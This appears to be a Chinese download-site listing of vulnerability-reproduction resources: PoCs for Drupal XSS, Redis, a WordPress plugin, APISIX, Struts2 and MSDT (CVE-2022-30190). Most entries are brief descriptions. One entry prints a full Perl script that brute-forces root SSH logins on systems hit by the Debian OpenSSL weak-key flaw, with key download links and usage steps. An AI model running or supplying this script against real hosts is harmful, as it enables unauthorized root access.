这里实现这个漏洞的复现。大家可以参考参考,这是老师要做的一个题目。
2023-05-02 20:39:44 2.42MB 漏洞复现
1
声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。文章目录一.ph
2023-03-30 14:20:57 2.23MB 网络安全 安全 软件/插件 sql
1
[ vulhub漏洞复现篇 ] Drupal XSS漏洞 (CVE-2019-6341)_POC 此POC是我用于vulhub复现的,可以先看我文章再下载
1
redis未授权漏洞vulhub靶场复现
2023-02-11 18:02:27 498KB redis 漏洞复现 安全漏洞
1
CVE-2017-1002008 WordPress Plugin 允许通过参数调用文件下载漏洞复现 。包中有漏洞复现所需软件安装包和poc;python脚本
2023-01-03 11:00:31 154.79MB CVE-2017-1002008 WordPressPlugin poc python脚本
1
Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit 解开Debian OpenSSL内的ssh钥匙只有65.536可能性,导致唯一的熵是引起钥匙的过程的Pid. 这导致以下perl脚本程序可以使用与暴力的预先计算好的ssh钥匙。如果钥匙在一个非被修补的debian或其他系统指南被安装配置,它就会运作。 在一个未修补的系统中,不需要Debian,做以下工作: keys provided by HD Moore - http://metasploit.com/users/hdm/tools/debian-openssl/ 1. Download http://sugar.metasploit.com/debian_ssh_rsa_2048_x86.tar.bz2 http://milw0rm.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2 2. 提取它对应目录 3. 输入/root/.ssh/authorized_keys与2048位的SSH RSA钥匙,引起在Upatched Debian (这是这盘剥将增殖比的钥匙 eak) 4. 运行perl脚本程序并且给它提取bzip2的位置. CODE: #!/usr/bin/perl my $keysPerConnect = 6; unless ($ARGV[1]) { print "Syntax : ./exploiter.pl pathToSSHPrivateKeys SSHhostToTry\n"; print "Example: ./exploiter.pl /root/keys/ 127.0.0.1\n"; print "By hack01[at]live[dot]cn\n"; exit 0; } chdir($ARGV[0]); opendir(A, $ARGV[0]) || die("opendir"); while ($_ = readdir(A)) { chomp; next unless m,^\d+$,; push(@a, $_); if (scalar(@a) > $keysPerConnect) { system("echo ".join(" ", @a)."; ssh -l root ".join(" ", map { "-i ".$_ } @a)." ".$ARGV[1]); @a = (); } } 5. 在几分钟(少于20分钟)以后享受胜利结果吧!
2022-12-05 15:02:46 47.9MB 漏洞复现
1
CVE-2020-13945检测脚本 给出脚本,可自查是否存在漏洞 APISIX是一个高性能API网关。在用户未指定管理员Token或使用了默认配置文件的情况下,攻击者利用默认的管理员Token访问到管理员接口,进而通过script参数来插入任意LUA脚本并执行
1
struts2综合利用工具.zip struts2综合利用工具可检测 S2-005 S2-009 S2-013 等等 struts2 相关漏洞 声明:工具仅供安全检测或网络攻防研究,非法用途后果自负. 声明:工具仅供安全检测或网络攻防研究,非法用途后果自负. .
1
CVE-2022-30190 MSDT远程代码执行漏洞复现POC1
2022-09-29 22:00:12 20KB POC CVE-2022-30190
1
CVE-2022-30190 MSDT远程代码执行漏洞复现POC2
2022-09-29 22:00:11 38KB POC CVE-2022-30190
1